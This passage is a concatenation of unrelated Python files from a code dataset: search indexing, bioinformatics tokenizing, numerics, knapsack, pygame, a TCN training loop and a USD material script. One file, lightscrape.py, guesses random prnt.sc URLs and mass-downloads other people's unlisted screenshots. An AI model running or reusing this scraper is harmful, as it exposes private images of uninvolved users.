Typesense Cloud use 443\n 'protocol': 'http' # For Typesense Cloud use https\n }],\n 'api_key': 'xyz',\n 'connection_timeout_seconds': 2\n})\n\n# print(fileName)\ndata = open(fileName,'r').read()\n# jsonl_file = jsonl_file.encode('latin-1', 'replace')\n\n\n# print(data[5861456:5861476])\n# print(str(unicodedata.normalize('NFKD', jsonl_file[5814010:5814020]).encode('ascii', 'ignore')))\n# data = unicodedata.normalize('NFKD', jsonl_file).encode('ascii', 'ignore').decode(\"utf-8\")\n\nreturn_data = client.collections['blogs'].documents.import_(data)\nprint('Documents length: ', len(data.split('\\n'))-1)\nprint('Sucessfully added: ', return_data.count('true'))\n\n", "sub_path": "addDocuments.py", "file_name": "addDocuments.py", "file_ext": "py", "file_size_in_byte": 873, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "typesense.Client", "line_number": 7, "usage_type": "call"}]} {"seq_id": "266831972", "text": "\"\"\"Module for Protein Alternate classification.\"\"\"\nimport re\nfrom typing import Optional\n\nfrom bioutils.sequences import aa3_to_aa1_lut\n\nfrom variation.schemas.token_response_schema import Token, TokenMatchType\nfrom .tokenizer import Tokenizer\n\n\nclass ProteinAlternate(Tokenizer):\n \"\"\"The Protein Alternate Tokenization class.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize the Protein Alternate Tokenizer class.\"\"\"\n self.__splitter = re.compile(r\"\\d+\")\n\n def match(self, input_string: str) -> Optional[Token]:\n \"\"\"Return Protein Alternate tokens if input string matches.\"\"\"\n potential_protein = self.__splitter.split(input_string)\n if all((len(potential_protein) == 2,\n potential_protein[0] in aa3_to_aa1_lut,\n not potential_protein[1])):\n return Token(\n token=potential_protein[0],\n token_type=\"ProteinAlternate\",\n input_string=input_string,\n match_type=TokenMatchType.UNSPECIFIED\n )\n else:\n return None\n", "sub_path": 
"variation/tokenizers/protein_alternate.py", "file_name": "protein_alternate.py", "file_ext": "py", "file_size_in_byte": 1081, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tokenizer.Tokenizer", "line_number": 11, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "bioutils.sequences.aa3_to_aa1_lut", "line_number": 22, "usage_type": "name"}, {"api_name": "variation.schemas.token_response_schema.Token", "line_number": 24, "usage_type": "call"}, {"api_name": "variation.schemas.token_response_schema.TokenMatchType.UNSPECIFIED", "line_number": 28, "usage_type": "attribute"}, {"api_name": "variation.schemas.token_response_schema.TokenMatchType", "line_number": 28, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "variation.schemas.token_response_schema.Token", "line_number": 18, "usage_type": "name"}]} {"seq_id": "478166927", "text": "# Script of derivate computation several h's\n# single point method\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef dfdx(f,x,h):\n return (f(x + h) - f(x - h))/(2*h)\n\nn = 200\nx = np.linspace(0, np.pi /50, n + 1)\nh1 = (np.pi /50 )/ n\nepsilon = 5e-324\nho = np.sqrt( (4*epsilon*100)/(10000))\n\n\ndef sin100x(x):\n return np.sin(100*x)\n\ndydx_1 = dfdx(sin100x,x,h1)\ndydx_2 = dfdx(sin100x,x,ho)\n\ndYdx = 100*np.cos(100*x)\n\n#plt.figure(figsize=(12,5))\nplt.plot(x,dydx_1,'.',label='Approx with adjusting h')\nplt.plot(x,dydx_2,'.',label='Approx with optimal h')\n\nplt.plot(x,dYdx,'b',label='Exact Value')\n\nplt.title('Derivative of y = cos(100x)')\nplt.legend(loc='best')\nplt.show()\n", "sub_path": "diff_comp_singlepoint.py", "file_name": "diff_comp_singlepoint.py", "file_ext": "py", "file_size_in_byte": 679, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "numpy.linspace", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}]} {"seq_id": "495737861", "text": "\"\"\"\nGiven a set of items, each with an arbitrary positive weight and a value = 1 or 2 ,\ndetermine which items to include in a collection so that the total weight is less 
than\nor equal to a given limit and the total value is as large as possible.\n\nFind a polynomial algorithm.\n--\noption:\nstandard knapsack\nbest(weight, with_item) -> best(weight, without_item), best(weight-i, without_item)+ val(item)\n\nat the end, gather\n\"\"\"\nimport collections\n\n\ndef res_knapsack(weights, vals, limit):\n    ones = []\n    twos = []\n    for idx, v in enumerate(vals):\n        if v == 1:\n            ones.append((weights[idx], idx))\n        else:\n            twos.append((weights[idx], idx))\n\n    ones = collections.deque(sorted(ones))\n    twos = collections.deque(sorted(twos))\n\n    last_one = None\n    weight = 0\n    added = set()\n    while len(ones) >= 2 and twos:\n        one_val = ones[0][0] + ones[1][0]\n        two_val = twos[0][0]\n        if weight + min(one_val, two_val) > limit:\n            break\n        if two_val <= one_val:\n            w, idx = twos.popleft()\n            weight += w\n            added.add(idx)\n        else:\n            w1, idx1 = ones.popleft()\n            w2, idx2 = ones.popleft()\n            weight += w1 + w2\n            added.add(idx1)\n            added.add(idx2)\n            last_one = (w2, idx2)\n\n    while twos and weight + twos[0][0] <= limit:\n        w, idx = twos.popleft()\n        weight += w\n        added.add(idx)\n\n    while ones and weight + ones[0][0] <= limit:\n        w, idx = ones.popleft()\n        weight += w\n        added.add(idx)\n        last_one = (w, idx)\n\n    if last_one and twos:  # twos may already be empty at this point\n        if weight - last_one[0] + twos[0][0] <= limit:\n            one_w, one_idx = last_one\n            weight -= one_w\n            added.remove(one_idx)\n            two_w, two_idx = twos.popleft()\n            weight += two_w\n            added.add(two_idx)\n\n    return added\n", "sub_path": "lc_discuss/old/batch_2c/restricted_knapsack.py", "file_name": "restricted_knapsack.py", "file_ext": "py", "file_size_in_byte": 1887, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "collections.deque", "line_number": 26, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 27, "usage_type": "call"}]} {"seq_id": "450032963", "text": "import pygame\n\npygame.init()\n\nSCREEN_SIZE = 500\nSTEP = 20\n\nscreen = pygame.display.set_mode((SCREEN_SIZE, SCREEN_SIZE))\n\n\nrunning = 1\n\nwhile running:\n    event = pygame.event.poll()\n    if event.type == pygame.QUIT:\n        running = 0\n\n    screen.fill((0, 0, 0))\n    for y in range(SCREEN_SIZE // STEP):\n        pygame.draw.line(screen, (255, 0, 255), (0, y * STEP), (SCREEN_SIZE - y * STEP, 0))\n\n    pygame.display.flip()\n", "sub_path": "src/lesson07/lines.py", "file_name": "lines.py", "file_ext": "py", "file_size_in_byte": 424, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pygame.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 22, "usage_type": "attribute"}]} {"seq_id": "551570972", "text": "from selenium import webdriver\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nimport wget, random, string, os, selenium, sys, platform\n\noptions = 
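# A small smoke test for res_knapsack() above (returned values are indices into the
# input lists; item values are restricted to 1 or 2 per the docstring):
weights = [4, 1, 2, 3, 2]
vals = [2, 1, 1, 2, 1]
picked = res_knapsack(weights, vals, limit=6)
print(sorted(picked),
      sum(weights[i] for i in picked),   # total weight, stays <= 6
      sum(vals[i] for i in picked))      # total value achieved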
Options()\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--window-size=1920x1080\")\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n\nBASE_URL = 'https://prnt.sc/'\nlower_alphabet = string.ascii_lowercase\n\nif platform.system() == 'Windows':\n webdriver = \"chromedriver.exe\"\nelif platform.system() == 'Linux':\n webdriver = \"chromedriver\"\nelse:\n print(\"Not supported OS. (Only Windows and Linux)\")\n\ndriver = Chrome(options=options, executable_path=webdriver)\n\ntry:\n os.mkdir('shots')\nexcept:\n print('Dir \"shots\" exists')\nfinally:\n os.chdir('shots')\n\ndef randNL():\n list = []\n for i in range(6):\n choise = random.randint(0,1)\n if choise == 0:\n list.append(random.randint(0,9))\n else:\n list.append(random.choice(lower_alphabet))\n END_URL = ''.join(map(str, list))\n return END_URL\n\ndef main(i):\n for n in range(int(i)):\n while True:\n driver.get(BASE_URL+randNL())\n try:\n img = driver.find_element_by_id('screenshot-image').get_attribute('src')\n if img.__contains__('imgur'):\n print('\\n{}.'.format(str(n+1)))\n wget.download(img)\n break\n except selenium.common.exceptions.NoSuchElementException:\n print('\\nElement not found')\n\nif __name__ == \"__main__\":\n main(sys.argv[1])\n", "sub_path": "lightscrape.py", "file_name": "lightscrape.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 6, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 12, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 14, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 15, "usage_type": "name"}, {"api_name": "platform.system", "line_number": 16, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 17, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 21, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 21, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 24, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 28, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 37, "usage_type": "call"}, {"api_name": "wget.download", "line_number": 49, "usage_type": "call"}, {"api_name": "selenium.common", "line_number": 51, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 55, "usage_type": "attribute"}]} {"seq_id": "277943545", "text": "import torch\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport sys\nfrom dataset import MitbinDataset\nfrom model import TCN\nimport numpy as np\nimport argparse\nfrom collections import defaultdict\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import accuracy_score,precision_score,recall_score\nimport os\n\nparser = argparse.ArgumentParser(description='Sequence Modeling - MITBIN-TCN')\nparser.add_argument('--batch_size', type=int, default=32, metavar='N',\n help='batch size (default: 32)')\nparser.add_argument('--cuda', action='store_true',\n help='use CUDA (default: True)')\nparser.add_argument('--dropout', 
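# Compatibility note for lightscrape.py above: the find_element_by_id() helper was
# removed in Selenium 4, so on current versions the lookup inside main() needs the By
# locator instead (reusing the script's existing driver):
from selenium.webdriver.common.by import By

img = driver.find_element(By.ID, 'screenshot-image').get_attribute('src')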
type=float, default=0.05,\n help='dropout applied to layers (default: 0.05)')\nparser.add_argument('--clip', type=float, default=-1,\n help='gradient clip, -1 means no clip (default: -1)')\nparser.add_argument('--epochs', type=int, default=10,\n help='upper epoch limit (default: 20)')\nparser.add_argument('--ksize', type=int, default=7,\n help='kernel size (default: 7)')\nparser.add_argument('--levels', type=int, default=8,\n help='# of levels (default: 8)')\nparser.add_argument('--log-interval', type=int, default=500, metavar='N',\n help='report interval (default: 10')\nparser.add_argument('--lr_T', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_E', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_G', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--lr_R', type=float, default=1e-3,\n help='initial learning rate (default: 1e-3)')\nparser.add_argument('--optim', type=str, default='Adam',\n help='optimizer to use (default: Adam)')\nparser.add_argument('--nhid', type=int, default=25,\n help='number of hidden units per layer (default: 25)')\nparser.add_argument('--seed', type=int, default=1111,\n help='random seed (default: 1111)')\nparser.add_argument('--fold', type=int, default=0,\n help='use which fold data (default: 0)')\nparser.add_argument('--num_threds', type=int, default=0,\n help='number of threads to fetch data (default: 0)')\nparser.add_argument('--alpha', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--beta', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--gamma', type=float, default=1.0,\n help='weight to control loss (default: 1.0)')\nparser.add_argument('--savedir', type=str, default='checkpoint0',\n help='weight to control loss (default: 1.0)')\nargs = parser.parse_args()\n\ntorch.manual_seed(args.seed)\nif torch.cuda.is_available():\n if not args.cuda:\n print(\"WARNING: You have a CUDA device, so you should probably run with --cuda\")\n\ndef mkdir(path):\n if not os.path.exists(path):\n os.makedirs(path)\nmkdir(args.savedir)\n\nbatch_size = args.batch_size\nbatch_size = 1\nn_classes = 2\ninput_channels_T = 3\ninput_channels_E = 1\ninput_channels_G = 1\n\n#seq_length = 500\nepochs = args.epochs\nsteps = 0\nnum_threds = args.num_threds\n\nalpha = args.alpha\nbeta = args.beta\ngamma = args.gamma\n\nprint(args)\ntrain_dataset = MitbinDataset(args, is_for_train=True)\ntrain_loader = torch.utils.data.DataLoader(\n train_dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=num_threds,\n drop_last=False)\ntest_dataset = MitbinDataset(args, is_for_train=False)\ntest_loader = torch.utils.data.DataLoader(\n test_dataset,\n batch_size=batch_size,\n shuffle=False,\n num_workers=num_threds,\n drop_last=False)\n\t\t\nchannel_sizes = [args.nhid] * args.levels\nkernel_size = args.ksize\n\nmodel_T = TCN(input_channels_T, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_E = TCN(input_channels_E, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\nmodel_G = TCN(input_channels_G, n_classes, channel_sizes, kernel_size=kernel_size, dropout=args.dropout)\n\nif args.cuda:\n model_T.cuda()\n model_E.cuda()\n model_G.cuda()\n \noptimizer = getattr(optim, args.optim)([{'params': model_T.parameters(), 'lr': args.lr_T},\n {'params': model_E.parameters(), 'lr': args.lr_E},\n {'params': 
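# Note on the setup above: `batch_size = 1` immediately overwrites
# `batch_size = args.batch_size`, so the --batch_size flag is parsed but silently
# ignored and every DataLoader runs with batches of one. Dropping the hard-coded line
# (or defaulting --batch_size to 1) would make the CLI flag meaningful again.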
model_G.parameters(), 'lr': args.lr_G}\n ])#,momentum=0.9)\n\ndef save_network(network, network_label, epoch_label):\n save_filename = 'net_epoch_%d_id_%s.pth' % (epoch_label, network_label)\n save_path = os.path.join(args.savedir, save_filename)\n torch.save(network.state_dict(), save_path)\n print ('saved net: %s' % save_path)\n \ndef train(ep):\n global steps\n total_loss = 0\n model_T_loss = 0\n model_E_loss = 0\n model_G_loss = 0\n \n model_T.train()\n model_E.train()\n model_G.train()\n \n correct = 0\n \n for batch_idx, (data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature) in enumerate(train_loader):\n \n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n output_E, _ = model_E.forward_E(data, data_reverse, feature)\n output_G, _, _ = model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n\n #print (output_T.shape)\n #print (output_G.shape)\n #print (output_E.shape)\n\n optimizer.zero_grad()\n loss_T = F.nll_loss(output_T, target)\n loss_E = F.nll_loss(output_E, target)\n loss_G = F.nll_loss(output_G, target)\n\n loss = alpha * loss_T + beta * loss_E + gamma * loss_G\n \n loss.backward()\n optimizer.step()\n total_loss += float(loss)\n #model_T_loss += float(loss_T)\n #model_E_loss += float(loss_E)\n #model_G_loss += float(loss_G)\n\n pred = output_G.data.max(1, keepdim=True)[1]\n correct += pred.eq(target.data.view_as(pred)).cpu().sum()\n\n if batch_idx > 0 and batch_idx % args.log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tTotal Loss: {:.6f}\\t ACC: {:.4f}'.format(\n ep, batch_idx * batch_size, len(train_dataset),\n 100. 
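# train() above never uses args.clip, even though the flag promises "-1 means no clip".
# If clipping is wanted, the conventional place is between loss.backward() and
# optimizer.step(); a sketch covering all three sub-models:
if args.clip > 0:
    for m in (model_T, model_E, model_G):
        torch.nn.utils.clip_grad_norm_(m.parameters(), args.clip)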
* batch_idx / len(train_dataset), total_loss/args.log_interval, float(correct) / (batch_idx*batch_size) ))\n total_loss = 0\n\ndef cal_performance(subject_dic, count_dic, real_dic):\n # vote results\n avg_acc = 0\n ind = 0\n real = []\n logits = []\n for key in subject_dic:\n subject_acc = subject_dic[key] / count_dic[key]\n print ('Subject %d: ACC is %f' %(key, subject_acc))\n ind += 1\n avg_acc += subject_acc\n real.append(real_dic[key])\n if subject_acc > 0.5:\n logit = real_dic[key]\n else:\n logit = 1 - real_dic[key]\n logits.append(logit)\n print ('Avg Subjects: ACC is %f' % (float(avg_acc) / ind))\n y_true = np.array(real)\n y_pred = np.array(logits)\n print ('Accuracy of Classifier:%f' % accuracy_score(y_true, y_pred))\n print ('ROC-AUC of Classifier:%f' % roc_auc_score(y_true, y_pred))\n precision, recall, _thresholds = precision_recall_curve(y_true, y_pred) \n print ('PR-AUC of Classifier:%f' % auc(recall, precision))\n print ('Macro-F1 of Classifier:%f' % f1_score(y_true, y_pred, average='micro'))\n print (\"precision:\", precision_score(y_true, y_pred))\n print (\"recall:\", recall_score(y_true, y_pred))\n \ndef test():\n model_T.eval()\n model_E.eval()\n model_G.eval()\n \n test_loss = 0\n \n correct_T = 0\n correct_E = 0\n correct_G = 0\n subject_dic_T = defaultdict(int)\n subject_dic_E = defaultdict(int)\n subject_dic_G = defaultdict(int)\n \n count_dic = defaultdict(int)\n\n real_dic = {}\n\n with torch.no_grad():\n for data, data_reverse, order_data, order_data_reverse, \\\n label, subject, feature in test_loader:\n data = torch.Tensor(data)\n data_reverse = torch.Tensor(data_reverse)\n order_data = torch.Tensor(order_data)\n order_data_reverse = torch.Tensor(order_data_reverse) \n feature = torch.Tensor(feature)\n target = torch.LongTensor(label)\n \n if args.cuda:\n data, data_reverse, order_data, order_data_reverse, feature, target = data.cuda(), data_reverse.cuda(), order_data.cuda(), order_data_reverse.cuda(), \\\n feature.cuda(), target.cuda()\n \n #seq_length = data.shape[1]\n #print (seq_length)\n data = data.view(-1, input_channels_E, data.shape[0])\n data_reverse = data_reverse.view(-1, input_channels_E, data_reverse.shape[0])\n order_data = order_data.view(-1, input_channels_T, order_data.shape[1])\n order_data_reverse = order_data_reverse.view(-1, input_channels_T, order_data_reverse.shape[1])\n \n data, data_reverse, order_data, order_data_reverse, target, feature = Variable(data), Variable(data_reverse), \\\n Variable(order_data), Variable(order_data_reverse), \\\n Variable(target), Variable(feature)\n\n output_T = model_T.forward_T(order_data, order_data_reverse) \n output_E, _ = model_E.forward_E(data, data_reverse, feature)\n output_G, _ , _= model_G.forward_G(data, data_reverse, output_T.detach(), output_E.detach())\n \n test_loss += F.nll_loss(output_G, target, size_average=False).item()\n\n pred_T = output_T.data.max(1, keepdim=True)[1]\n eq_T = pred_T.eq(target.data.view_as(pred_T)).cpu().sum()\n correct_T += eq_T\n\n pred_E = output_E.data.max(1, keepdim=True)[1]\n eq_E = pred_E.eq(target.data.view_as(pred_E)).cpu().sum()\n correct_E += eq_E\n \n pred_G = output_G.data.max(1, keepdim=True)[1]\n eq_G = pred_G.eq(target.data.view_as(pred_G)).cpu().sum()\n correct_G += eq_G\n\n subject_dic_T[subject.cpu().numpy()[0]] += eq_T.numpy()\n subject_dic_E[subject.cpu().numpy()[0]] += eq_E.numpy()\n subject_dic_G[subject.cpu().numpy()[0]] += eq_G.numpy()\n \n \n count_dic[subject.cpu().numpy()[0]] += 1.0\n real_dic[subject.cpu().numpy()[0]] = 
target.cpu().numpy()[0]\n\n test_loss /= len(test_dataset)\n print('\\nTest set: Average loss: {:.4f}, ACC_T: {:.4f} ACC_E: {:.4f} ACC_G: {:.4f}\\n'.format(\n test_loss, float(correct_T) / len(test_dataset), float(correct_E) / len(test_dataset), float(correct_G) / len(test_dataset)))\n\n print (\"-------------------------model_T--------------------------------\")\n cal_performance(subject_dic_T, count_dic, real_dic)\n print (\"-------------------------model_E--------------------------------\")\n cal_performance(subject_dic_E, count_dic, real_dic)\n print (\"-------------------------model_G--------------------------------\")\n cal_performance(subject_dic_G, count_dic, real_dic)\n \n return test_loss\n\n\nif __name__ == \"__main__\":\n for epoch in range(1, epochs+1):\n train(epoch)\n test()\n save_network(model_T, \"T\", epoch)\n save_network(model_E, \"E\", epoch)\n save_network(model_G, \"G\", epoch)\n", "sub_path": "mitbin_test.py", "file_name": "mitbin_test.py", "file_ext": "py", "file_size_in_byte": 13312, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 64, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 70, "usage_type": "call"}, {"api_name": "dataset.MitbinDataset", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 91, "usage_type": "attribute"}, {"api_name": "dataset.MitbinDataset", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 98, "usage_type": "attribute"}, {"api_name": "model.TCN", "line_number": 108, "usage_type": "call"}, {"api_name": "model.TCN", "line_number": 109, "usage_type": "call"}, {"api_name": "model.TCN", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 117, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 160, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 173, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 
174, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 175, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 214, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 215, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 216, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_curve", "line_number": 217, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 218, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 219, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 220, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 221, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 233, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 234, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 235, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 237, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 241, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 262, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 263, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 264, "usage_type": "call"}, {"api_name": "torch.nn.functional.nll_loss", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 270, "usage_type": "name"}]} {"seq_id": "477692635", "text": "'''Attempt to set a material on the kitchen fridge'''\n\nimport os\nimport argparse\n\nfrom pxr import Gf, Kind, Sdf, Usd, UsdGeom, UsdShade\n\n\nEXPORT_NAME = 'KitchenFridgeMaterial.usda'\nTEXTURE_FILE = os.path.abspath('../textures/UV_Grid_Sm.jpg')\nFRIDGE_PATH = '/Kitchen_set/Props_grp/North_grp/FridgeArea_grp/Refridgerator_1/Geom/Body'\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='Add a texture to a Kitchen scene table save it')\n\n parser.add_argument('kitchen', help='Kitchen set file location')\n\n return parser\n\ndef make_material(stage, path):\n # Create material\n material = UsdShade.Material.Define(stage, path)\n mat_path = material.GetPath()\n stInput = material.CreateInput('frame:stPrimvarName', Sdf.ValueTypeNames.Token)\n stInput.Set('st')\n\n pbrShader = UsdShade.Shader.Define(stage, mat_path.AppendPath('PBRShader'))\n pbrShader.CreateIdAttr('UsdPreviewSurface')\n\n stReader = UsdShade.Shader.Define(stage, mat_path.AppendPath('stReader'))\n stReader.CreateIdAttr('UsdPrimvarReader_float2')\n stReader.CreateInput('varname',Sdf.ValueTypeNames.Token).ConnectToSource(stInput)\n\n diffuseTextureSampler = UsdShade.Shader.Define(stage, mat_path.AppendPath('diffuseTexture'))\n 
